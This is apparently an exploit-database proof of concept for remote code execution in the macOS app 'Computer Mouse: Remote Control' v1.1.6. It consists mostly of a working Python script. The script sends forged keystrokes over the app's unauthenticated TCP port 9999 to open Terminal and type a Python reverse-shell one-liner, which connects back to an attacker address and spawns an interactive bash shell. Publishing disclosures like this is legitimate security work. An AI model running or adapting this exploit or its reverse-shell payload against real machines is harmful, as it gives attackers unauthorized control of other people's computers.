# Exploit Title: Computer Mouse: Remote Control v1.1.6 - Remote Code
Execution
# Date: 24/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage:
https://apps.apple.com/us/developer/%D1%83%D0%BC%D0%BD%D0%BE%D0%B5-%D0%BF%D0%BE%D1%82%D1%80%D0%B5%D0%B1%D0%BB%D0%B5%D0%BD%D0%B8%D0%B5/id1416452624
# Software Link:
https://apps.apple.com/us/app/computer-mouse-remote-control/id1561913205?l=en-GB
# Version: 1.1.6
# Tested on: macOS 14.4 Sonoma


'''
Description:

"Computer Mouse: Remote Control" v1.1.6 for macOS is vulnerable to
unauthenticated Remote Code Execution (RCE) via TCP port 9999. An attacker
on the same network can inject simulated keyboard input, allowing arbitrary
command execution without user interaction or authentication.

'''

import socket
import time

HOST, PORT = '192.168.8.103', 9999
LHOST, LPORT = '192.168.8.102', 4444

def send_commands():
    try:
        with socket.socket() as s:
            s.connect((HOST, PORT))
            cmds = [

                ('{"value":" "}|{"value":"[SPACE]"}|', 2),
                ('{"value":"Terminal"}|', 1),
                ('{"value":"[ENTER]"}|', 1),
                (f'{{"value":"python3 -c \\"import
socket,subprocess,os;s=socket.socket();s.connect((\\\\\\"{LHOST}\\\\\\",{LPORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\\\\\\"/bin/bash\\\\\\",\\\\\\"-i\\\\\\"])
\\""}}|', 1),
                ('{"value":"[ENTER]"}|', 1)
            ]
            for cmd, delay in cmds:
                s.sendall(cmd.encode()), time.sleep(delay)
    except Exception as e: print(f"Error: {e}")

if __name__ == "__main__":
    send_commands(), time.sleep(5)